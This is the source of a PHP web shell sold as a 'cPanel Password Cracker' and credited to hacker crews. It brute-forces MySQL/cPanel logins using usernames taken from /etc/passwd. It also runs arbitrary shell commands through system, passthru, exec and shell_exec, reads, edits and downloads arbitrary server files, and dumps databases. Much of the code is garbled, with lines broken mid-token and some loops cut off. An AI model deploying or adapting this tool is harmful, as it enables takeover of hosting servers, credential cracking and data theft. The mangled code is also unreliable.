cPanel Password Cracker:: Gunakan dengan BIJAK

/*
Cpanel Cracker By Hacking Sec-------------> edited by :: H4ntu_Cr3w
*/
@set_time_limit(0);
@error_reporting(0);
echo '
';
function in($type,$name,$size,$value,$checked=0)
{
$ret = "
{
$ret .= "size=".$size." "; }
$ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">
"; }
class my_sql
{
var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $b
ase = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $c
olumns; var $num_rows; var $num_fields; var $dump; function connect()
{
switch($this->db)
{
case 'MySQL': if(empty($this->port))
{
$this->port = '3306'; }
if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_conn
ect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->
connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break
; case 'MSSQL': if(empty($this->port))
{
$this->port = '1433'; }
if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_conn
ect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection)
return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if
(empty($this->port))
{
$this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' pa
ssword='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_conn
ect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->co
nnection)) return 1; $this->error = @pg_last_error($this->connection); break; ca
se 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @oci
logon($this->user, $this->pass, $this->base); if(is_resource($this->connection))
return 1; $error = @ocierror(); $this->error=$error['message']; break; }
return 0; }
function select_db()
{
switch($this->db)
{
case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $th
is->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_
select_db($this->base,$this->connection)) return 1; $this->error = "Can't select

database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1;

break; }
return 0; }
function query($query)
{
$this->res=$this->error=''; switch($this->db)
{
case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this
->connection)))
{
$this->error = @mysql_error($this->connection); return 0; }
else if(is_resource($this->res))
{
return 1; }
return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this
->connection)))
{
$this->error = 'Query error'; return 0; }
else if(@mssql_num_rows($this->res) > 0)
{
return 1; }
return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->con
nection,$query)))
{
$this->error = @pg_last_error($this->connection); return 0; }
else if(@pg_num_rows($this->res) > 0)
{
return 1; }
return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connect
ion,$query)))
{
$this->error = 'Query parse error'; }
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2; return 1; }
$error = @ocierror(); $this->error=$error['message']; }
break; }
return 0; }
function get_result()
{
$this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=
0; switch($this->db)
{
case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@m
ysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc
($this->res))); @mysql_free_result($this->res); if($this->num_rows)
{
$this->columns = @array_keys($this->rows[0]); return 1;}
break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fi
elds=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetc
h_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
{
$this->columns = @array_keys($this->rows[0]); return 1;}
; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num
_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_a
ssoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
{
$this->columns = @array_keys($this->rows[0]); return 1;}

break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !=

= ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreesta
tement($this->res); if($this->num_rows)
{
$this->columns = @array_keys($this->rows[0]); return 1;}
break; }
return 0; }
function dump($table)
{
if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->
dump[1] = '## --------------------------------------- '; $this->dump[2] = '## C
reated: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $t
his->dump[4] = '##
Table: '.$table; $this->dump[5] = '## -------------------------------------- '; switch($this->db)
{
case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/
SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return
0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## -------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * F
ROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$in
um_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v)
{
$this->rows[$i][$k] = @mysql_real_escape_string($v);}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).
'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT
* FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$inum
_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v)
{
$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VA
LUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->quer
y('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for(
$i=0;$inum_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v)
{
$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VA
LUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## un
der construction'; break; default: return 0; break; }
return 1; }
function close()
{
switch($this->db)
{
case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_clos
e($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); br
eak; case 'Oracle': @oci_close($this->connection); break; }
}
function affected_rows()
{
switch($this->db)
{

case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': ret

urn @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affec
ted_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); bre
ak; default: return 0; break; }
}
}
if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['
d_name']))
{
if(!$file=@fopen($_POST['d_name'],"r"))
{
err(1,$_POST['d_name']); $_POST['cccc']=""; }
else
{
@ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,
@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; co
mpress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding))
{
header('Content-Encoding: ' . $content_encoding); }
header("Content-type: ".$mime_type); header("Content-disposition: attachment; f
ilename=\"".$filename."\";"); echo $filedump; exit(); }
}
if(isset($_GET['phpinfo']))
{
echo @phpinfo(); echo "
[ BACK ]
"; die(); }
if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query")
{
echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['
db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sq
l->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode
(';',$_POST['db_query']); echo '
'; if(!$sql->connect()) echo "
".$sql->error."
"; else
{
if(!empty($sql->base)&&!$sql->select_db()) echo "
".$sql->error."
"; else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."
"; switch($sql->query($query))
{
case '0': echo "
Error : ".$sql->error.""; break; case '1': if($sql->get_result())
{
echo "
"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_
QUOTES); $keys = @implode(" ", $sql->columns); echo " ".$keys." "; for($i=0;$in
um_rows;$i++)
{
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_
QUOTES); $values = @implode("
",$sql->rows[$i]); echo ' '.$values.' '; }
echo "

"; }
break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); ech
o "
affected rows : ".$ar."
"; break; }
}
}
}
}
echo "
Cpanel Cracker by C0die r00t";
echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['d
b_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','
mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db
_query');
echo "
"; echo "Base: base."\">
"; echo "".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nS
ELECT * FROM user;"))."
"; echo ""; echo "
[ BACK ]
"; die(); }

function ccmmdd($ccmmdd2,$att)
{
global $ccmmdd2,$att;
echo '

';
if($_POST['att']==null)
{
echo '
}else{
echo "

system';
$_POST[att]
system

";
}

echo '
passthru
exec
shell_exec

';
if($_POST[att]=='system')
{
echo '
';
system($_POST['ccmmdd2']);
';

echo '
}

if($_POST[att]=='passthru')
{
echo '
';
passthru($_POST['ccmmdd2']);
';

echo '
}

if($_POST[att]=='exec')
{
echo '

';
exec($_POST['ccmmdd2'],$res);
echo $res = join("\n",$res);
';

echo '
}

if($_POST[att]=='shell_exec')
{
echo '
echo
echo '

';
shell_exec($_POST['ccmmdd2']);
';

}
echo '
';
exit;
}
if($_POST['page']=='edit')
{
$code=@str_replace("\r\n","\n",$_POST['code']);
$code=@str_replace('\\','',$code);
$fp = fopen($pathclass, 'w');
fwrite($fp,"$code");
fclose($fp);
echo "
OK Edit

BACK";
exit;
}

if($_POST['page']=='show')
{
$pathclass =$_POST['pathclass'];
echo '
';
$sahacker = fopen($pathclass, "rb");
echo '
'.$pathclass.'
';
$code = fread($sahacker, filesize($pathclass));
echo $code =htmlspecialchars($code);
echo '
';
fclose($sahacker);
echo '
';
exit;
}

if($_POST['page']=='ccmmdd')
{
echo ccmmdd($ccmmdd2,$att);
exit;
}

if($_POST['page']=='find')
{
if(isset($_POST['usernames']) && isset($_POST['passwords']))
{
if($_POST['type'] == 'passwd'){
$e = explode("\n",$_POST['usernames']);
foreach($e as $value){
$k = explode(":",$value);
$username .= $k['0']." ";
}
}elseif($_POST['type'] == 'simple'){
$username = str_replace("\n",' ',$_POST['usernames']);
}
$a1 = explode(" ",$username);
$a2 = explode("\n",$_POST['passwords']);
$id2 = count($a2);
$ok = 0;
foreach($a1 as $user )
{
if($user !== '')
{
$user=trim($user);
for($i=0;$i
{
$pass = trim($a2[$i]);
if(@mysql_connect('localhost',$user,$pass))
{
echo "Hacking Sec~ user is ($user) Password is ($pass)
";
$ok++;
}
}
}
}
echo "
You Found $ok Cpanel (Hacking Sec)";
echo "
BACK";
exit;
}
}
?>

Cpanel Cracker By Hacking Sec

User :

Pass :

Type :
Simple :
/etc/passwd :

CMD MYSQL

user
pass
database

cmd ~
SHOW DATABASES;
SHOW TABLES user_vb ;
SELECT * FROM user;
SELECT version();
SELECT user();

CMD
system - passthru - exec - shell_exec

cmd ~
if($_POST['att']==null)
{
echo '
}else{
echo "

system';
$_POST[att]
system

";
}
?>
passthru
exec
shell_exec

Show
File And Edit

Path ~

Info
Security

Safe Mode
$safe_mode = ini_get('safe_mode');
if($safe_mode=='1')
{
echo 'ON';
}else{
echo 'OFF';
}
?>

Function
if(''==($func=@ini_get('disable_functions')))
{
echo "No Security for Function";
}else{
echo "$func";
}
?>

if ($_GET['user'] )
system('ls /var/mail');

for($uid=0;$uid
}

?>